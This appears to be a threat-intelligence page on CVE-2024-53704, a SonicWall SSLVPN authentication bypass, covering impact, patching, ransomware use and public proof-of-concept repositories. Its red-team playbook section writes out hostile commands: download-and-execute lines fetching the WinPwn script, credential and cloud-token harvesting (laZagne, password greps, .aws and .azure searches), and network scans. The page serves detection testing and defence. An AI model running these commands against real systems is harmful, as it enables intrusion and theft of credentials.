CVE-2024-53704
Overview
This vulnerability is an authentication bypass caused by improper validation within the SSLVPN authentication mechanism of SonicWall SonicOS. The flaw resides in the handling of session cookies and authentication tokens at the SSLVPN client interface, specifically in the /cgi-bin/sslvpnclient endpoint. The authentication logic fails to correctly verify the legitimacy of session cookies, allowing unauthorized access without valid credentials.
Vulnerability Description
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
Impact
An unauthenticated attacker can hijack active SSLVPN sessions, gaining unauthorized remote access to internal networks protected by the VPN. No user interaction or credentials are required, and multi-factor authentication is bypassed during exploitation. This access enables attackers to perform lateral movement, data exfiltration, or deploy further attacks within the corporate environment, compromising confidentiality and network integrity.
Solution
Apply the security updates provided by SonicWall as detailed in advisory SNWLID-2025-0003, which addresses this authentication bypass in SonicOS versions including 7.1.2-7019 and 8.0.0-8035. Administrators should refer to the official vendor advisory at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003 for patch installation instructions and recommended configuration changes to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
sinobi
|
274 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the SSLVPN authentication mechanism presents a significant risk due to its improper authentication design flaw, which allows remote attackers to bypass authentication controls. This weakness arises from inadequate checks in the authentication process, enabling unauthorized access to sensitive resources and systems. The affected products, particularly those running specific versions of SonicWall's SonicOS, are designed to facilitate secure remote access for users. However, the failure to properly validate authentication requests creates a critical entry point for malicious actors.
Attack vectors exploiting this vulnerability are diverse and can be executed with relative ease. An attacker could leverage social engineering tactics to trick legitimate users into revealing their credentials or utilize automated scripts to send crafted requests that exploit the authentication bypass. Once inside the network, an attacker could gain access to internal resources, potentially leading to data exfiltration, lateral movement within the network, or even the deployment of malware. The ability to bypass authentication without detection significantly increases the potential for widespread compromise, making this vulnerability particularly concerning for organizations relying on secure remote access solutions.
The real-world impact of this vulnerability is profound, especially for businesses that depend on remote access for their operations. Organizations in sectors such as finance, healthcare, and critical infrastructure could face severe repercussions, including data breaches, regulatory fines, and reputational damage. The high CVSS score of 9.8 indicates that the vulnerability poses a critical threat, suggesting that successful exploitation could lead to full system compromise. Furthermore, the potential for attackers to leverage this vulnerability as a foothold for further attacks amplifies the business risk, as it not only endangers sensitive information but also disrupts operational continuity.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected SonicWall products is essential to close the authentication loophole. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their remote access configurations. Monitoring network traffic for unusual patterns and implementing robust logging can help detect unauthorized access attempts. Furthermore, employing multi-factor authentication (MFA) can significantly enhance security by adding an additional layer of verification, making it more difficult for attackers to gain unauthorized access even if they manage to bypass initial authentication.
In conclusion, the improper authentication vulnerability in the SSLVPN mechanism of SonicWall products poses a significant threat to organizations relying on secure remote access. The ease of exploitation, coupled with the potential for severe business impact, underscores the necessity for immediate action. By prioritizing detection and mitigation strategies, organizations can safeguard their networks against this critical vulnerability, thereby protecting sensitive data and maintaining operational integrity.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-53704, with a significant increase in observed activity across multiple environments. This surge coincides with the emergence of additional ransomware groups leveraging the vulnerability, expanding the threat actor landscape and indicating broader criminal adoption. Notably, new proof-of-concept exploits have been published publicly, lowering the barrier for adversaries to weaponize this flaw. Although the CVSS score was revised downward to 8.2, reflecting refined impact assessments, the practical risk remains high due to active exploitation and ransomware associations. Our telemetry confirms that while the overall exploit probability score remains stable, the operational tempo of attacks exploiting this improper authentication weakness is intensifying. For defenders, this evolution underscores the urgency of heightened vigilance around SonicWall SSLVPN deployments, as the vulnerability is increasingly integrated into ransomware campaigns, amplifying potential operational disruption and data compromise.
Update 2 — May 23, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-53704, with telemetry indicating a significant uptick in attacker activity leveraging this improper authentication flaw in SonicWall SonicOS SSLVPN. This surge coincides with the emergence of new proof-of-concept exploits publicly available on GitHub, which demonstrate practical methods for session hijacking through swap-cookie manipulation. The increased operational tempo is further underscored by continued associations with multiple ransomware groups actively integrating this vulnerability into their campaigns, amplifying the risk of disruptive and financially motivated intrusions. Although the EPSS score remains stable, the qualitative rise in exploitation attempts and the expanding ransomware linkage elevate the practical threat level, signaling a heightened urgency for defenders to monitor and respond to this evolving attack vector.
Update 3 — June 08, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-53704, accompanied by an upward revision of the CVSS score to 9.8, reflecting a reassessment of the vulnerability’s criticality. This adjustment underscores the heightened potential impact of successful exploitation, particularly given the vulnerability’s capability to bypass SSLVPN authentication remotely. Concurrently, the integration of this flaw into ransomware campaigns linked to multiple high-profile groups continues to solidify its role as a favored vector for disruptive intrusions. Although the overall exploit prediction score remains stable, the combination of increased detection activity and elevated severity rating signals an intensifying threat environment. For defenders, this evolution necessitates heightened vigilance as attackers refine and expand their operational use of this vulnerability, increasing the likelihood of successful compromise and subsequent ransomware deployment.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-53704, with telemetry indicating a significant uptick in attacker activity leveraging this SSLVPN authentication bypass. This increase coincides with the emergence of new proof-of-concept exploits publicly available on GitHub, which demonstrate sophisticated techniques such as session hijacking via swap-cookie manipulation. The continued integration of this vulnerability into ransomware campaigns by groups including Sinobi, Akira, and RansomHub underscores its growing operational value as a vector for initial access and lateral movement. Although the EPSS score remains stable, the surge in exploitation attempts and the proliferation of advanced exploit tools elevate the practical risk to organizations running SonicWall SonicOS. For defenders, this evolving threat landscape signals an urgent need to reassess exposure and monitoring strategies, as adversaries are refining their capabilities to achieve reliable authentication bypass and subsequent ransomware deployment.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sonicos | All |
cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | 7.1.2-7019 |
cpe:2.3:o:sonicwall:sonicos:7.1.2-7019:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | 8.0.0-8035 |
cpe:2.3:o:sonicwall:sonicos:8.0.0-8035:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
istagmbh/CVE-2024-53704
demonstriert, wie mittels missbräuchlicher Nutzung eines Swap-Cookies eine VPN-Session übernommen werden kann. Wichtig: ...
|
istagmbh | 2 | 0 | 2025-02-11 | View |
|
sfewer-r7/SonicSessionLeak
Exploit for CVE-2024-53704 - SonicWall SonicOS SSLVPN authentication bypass
|
sfewer-r7 | 0 | 0 | 2025-01-22 | View |
|
anir0y/sonicwall-audit-toolkit
SonicWall security audit toolkit with vulnerable CTF lab (CVE-2021-20038, CVE-2024-53704)
|
anir0y | 0 | 0 | 2026-02-23 | View |
Ransomware Groups 1
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-53704 |
| psirt.global.sonicwall.com |
GitHub CVE
vendor-advisory
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-53704 |